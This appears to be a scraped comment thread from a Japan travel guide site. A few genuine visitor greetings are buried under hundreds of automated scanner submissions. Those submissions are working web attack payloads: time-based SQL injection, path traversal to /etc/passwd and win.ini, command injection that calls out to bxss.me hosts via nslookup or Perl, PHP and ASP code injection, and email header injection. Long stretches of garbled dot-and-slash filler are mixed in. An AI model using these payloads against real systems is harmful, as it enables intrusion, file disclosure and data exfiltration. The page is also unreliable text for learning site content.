\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Shi
";print(md5(31337));$a="
re: Shi
'"
re: Shi
WEB-INF/web.xml
re: Shi
${@print(md5(31337))}
re: Shi
<!--
re: Shi
WEB-INF\web.xml
re: Shi
${@print(md5(31337))}\
re: Shi
'.print(md5(31337)).'
Thank you for building this Saito-san. Can’t wait my next month trip using this guide
re: Justeat
PxKAZjOr
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+767-767-1=0+0+0+1
re: Justeat
-1 OR 3+767-767-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
W6c0y4jR'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 70=(SELECT 70 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 323=(SELECT 323 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: Justeat
0bcreVfv' OR 893=(SELECT 893 FROM PG_SLEEP(15))--
re: Justeat
mmLUNLFZ') OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: Justeat
7q0LSU7N')) OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@VCu9H
re: Justeat
1Do5YhIzbrO
re: Justeat
response.write(9000582*9820965)
re: Justeat
'+response.write(9000582*9820965)+'
re: Justeat
"+response.write(9000582*9820965)+"
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
%0abcc:074625.67-22295.67.b4701.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-22296.67.b4701.19990.2@bxss.me
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
echo jkpqkt$()\ gesnqn\nz^xyu||a #' &echo jkpqkt$()\ gesnqn\nz^xyu||a #|" &echo jkpqkt$()\ gesnqn\nz^xyu||a #
re: Justeat
/etc/passwd
re: Justeat
&echo xxrzky$()\ mdgfcm\nz^xyu||a #' &echo xxrzky$()\ mdgfcm\nz^xyu||a #|" &echo xxrzky$()\ mdgfcm\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
|echo kdqgwl$()\ fzrdnh\nz^xyu||a #' |echo kdqgwl$()\ fzrdnh\nz^xyu||a #|" |echo kdqgwl$()\ fzrdnh\nz^xyu||a #
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
(nslookup hitfeqldokwlr4e5d1.bxss.me||perl -e "gethostbyname('hitfeqldokwlr4e5d1.bxss.me')")
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
$(nslookup hitfnveldzknp80c79.bxss.me||perl -e "gethostbyname('hitfnveldzknp80c79.bxss.me')")
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
${10000071+10000229}
re: Justeat
&nslookup hitdklbdeygzg1d40c.bxss.me&'\"`0&nslookup hitdklbdeygzg1d40c.bxss.me&`'
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
&(nslookup hitcaowzcotiu4ea51.bxss.me||perl -e "gethostbyname('hitcaowzcotiu4ea51.bxss.me')")&'\"`0&(nslookup hitcaowzcotiu4ea51.bxss.me||perl -e "gethostbyname('hitcaowzcotiu4ea51.bxss.me')")&`'
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
|(nslookup hittpnrmlhlpldcaa7.bxss.me||perl -e "gethostbyname('hittpnrmlhlpldcaa7.bxss.me')")
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
`(nslookup hitbgsrkasujrcc03c.bxss.me||perl -e "gethostbyname('hitbgsrkasujrcc03c.bxss.me')")`
re: Justeat
file:///etc/passwd
re: Justeat
;(nslookup hitwmvpspchezbdb1c.bxss.me||perl -e "gethostbyname('hitwmvpspchezbdb1c.bxss.me')")|(nslookup hitwmvpspchezbdb1c.bxss.me||perl -e "gethostbyname('hitwmvpspchezbdb1c.bxss.me')")&(nslookup hitwmvpspchezbdb1c.bxss.me||perl -e "gethostbyname('hitwmvpspchezbdb1c.bxss.me')")
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
/WEB-INF/web.xml
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
)
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
!(()&&!|*|*|
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
^(#$!@#$)(()))******
re: Justeat
'.gethostbyname(lc('hitvc'.'owgqcmkya1603.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(76).chr(108).chr(85).'
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
".gethostbyname(lc("hitkb"."iabfroge714e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(98).chr(88)."
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
/etc/shells
re: Justeat
WEB-INF/web.xml
re: Justeat
c:/windows/win.ini
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(110).concat(71).concat(121).concat(66)+(require"socket"
Socket.gethostbyname("hitqc"+"apauhutx74b24.bxss.me.")[3].to_s)+"
re: Justeat
WEB-INF\web.xml
re: Justeat
bxss.me
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(108).concat(67).concat(112).concat(84)+(require'socket'
Socket.gethostbyname('hitqb'+'jnnaxtjkbb888.bxss.me.')[3].to_s)+'
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
';print(md5(31337));$a='
re: Justeat
'"
re: Justeat
";print(md5(31337));$a="
re: Justeat
<!--
re: Justeat
${@print(md5(31337))}
re: Justeat
${@print(md5(31337))}\
re: Justeat
'.print(md5(31337)).'
Dropping by to say hi to everyone. I am not based in Japan but do make an effort to travel to Japan often enough to explore all corners and have good food. Glad to know all of you here, I have been lazy to write down my thoughts on my previous experiences but now I feel motivated to share more. Hopefully will get to meet some of you guys some day!
re: kanivour
aNTiO0Zm
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
-1 OR 2+403-403-1=0+0+0+1
re: kanivour
-1 OR 3+403-403-1=0+0+0+1
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kanivour
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kanivour
-1; waitfor delay '0:0:15' --
re: kanivour
-1); waitfor delay '0:0:15' --
re: kanivour
1 waitfor delay '0:0:15' --
re: kanivour
44erqQeN'; waitfor delay '0:0:15' --
re: kanivour
-5 OR 776=(SELECT 776 FROM PG_SLEEP(15))--
re: kanivour
-5) OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: kanivour
-1)) OR 586=(SELECT 586 FROM PG_SLEEP(15))--
re: kanivour
z5i8zpYs' OR 529=(SELECT 529 FROM PG_SLEEP(15))--
re: kanivour
QSRI6O5F') OR 255=(SELECT 255 FROM PG_SLEEP(15))--
re: kanivour
G2Y6ftSc')) OR 754=(SELECT 754 FROM PG_SLEEP(15))--
re: kanivour
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kanivour
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kanivour
'||(select 1 from (select pg_sleep(15))x)||'
re: kanivour
''||(select 1 from (select pg_sleep(15))x)||''
re: kanivour
1'"
re: kanivour
@@VQpjy
re: kanivour
1Cep3RARecO
re: kanivour
response.write(9963411*9436725)
re: kanivour
'+response.write(9963411*9436725)+'
re: kanivour
"+response.write(9963411*9436725)+"
re: kanivour
%0abcc:074625.67-22267.67.20a7a.19990.2@bxss.me
re: kanivour
to@example.com>%0d%0abcc:074625.67-22268.67.20a7a.19990.2@bxss.me
re: kanivour
../../../../../../../../../../../../../../etc/passwd
re: kanivour
../../../../../../../../../../../../../../windows/win.ini
re: kanivour
file:///etc/passwd
re: kanivour
../../../../../../../../../../../../../../../proc/version
re: kanivour
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kanivour
../../../../../../../../../../etc/passwd%00.jpg
re: kanivour
echo ioeqdi$()\ hbwxpj\nz^xyu||a #' &echo ioeqdi$()\ hbwxpj\nz^xyu||a #|" &echo ioeqdi$()\ hbwxpj\nz^xyu||a #
re: kanivour
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kanivour
&echo cfdlui$()\ zbpahk\nz^xyu||a #' &echo cfdlui$()\ zbpahk\nz^xyu||a #|" &echo cfdlui$()\ zbpahk\nz^xyu||a #
re: kanivour
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kanivour
|echo dngupm$()\ cchjfm\nz^xyu||a #' |echo dngupm$()\ cchjfm\nz^xyu||a #|" |echo dngupm$()\ cchjfm\nz^xyu||a #
re: kanivour
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kanivour
(nslookup hitqphyjazaww84026.bxss.me||perl -e "gethostbyname('hitqphyjazaww84026.bxss.me')")
re: kanivour
/etc/passwd
re: kanivour
$(nslookup hitkmynftwetc6ff1f.bxss.me||perl -e "gethostbyname('hitkmynftwetc6ff1f.bxss.me')")
re: kanivour
%2fetc%2fpasswd
re: kanivour
<esi:include src="http://bxss.me/rpb.png"/>
re: kanivour
&nslookup hitzvmfjhnqlsea30b.bxss.me&'\"`0&nslookup hitzvmfjhnqlsea30b.bxss.me&`'
re: kanivour
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kanivour
&(nslookup hithtzincvtut5dd06.bxss.me||perl -e "gethostbyname('hithtzincvtut5dd06.bxss.me')")&'\"`0&(nslookup hithtzincvtut5dd06.bxss.me||perl -e "gethostbyname('hithtzincvtut5dd06.bxss.me')")&`'
re: kanivour
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kanivour
|(nslookup hitdkwmypwldgaacbd.bxss.me||perl -e "gethostbyname('hitdkwmypwldgaacbd.bxss.me')")
re: kanivour
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kanivour
${9999016+9999906}
re: kanivour
`(nslookup hithmsnxomjyse7d6d.bxss.me||perl -e "gethostbyname('hithmsnxomjyse7d6d.bxss.me')")`
re: kanivour
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kanivour
;(nslookup hitkzkmrmxnbsdbc52.bxss.me||perl -e "gethostbyname('hitkzkmrmxnbsdbc52.bxss.me')")|(nslookup hitkzkmrmxnbsdbc52.bxss.me||perl -e "gethostbyname('hitkzkmrmxnbsdbc52.bxss.me')")&(nslookup hitkzkmrmxnbsdbc52.bxss.me||perl -e "gethostbyname('hitkzkmrmxnbsdbc52.bxss.me')")
re: kanivour
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kanivour
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.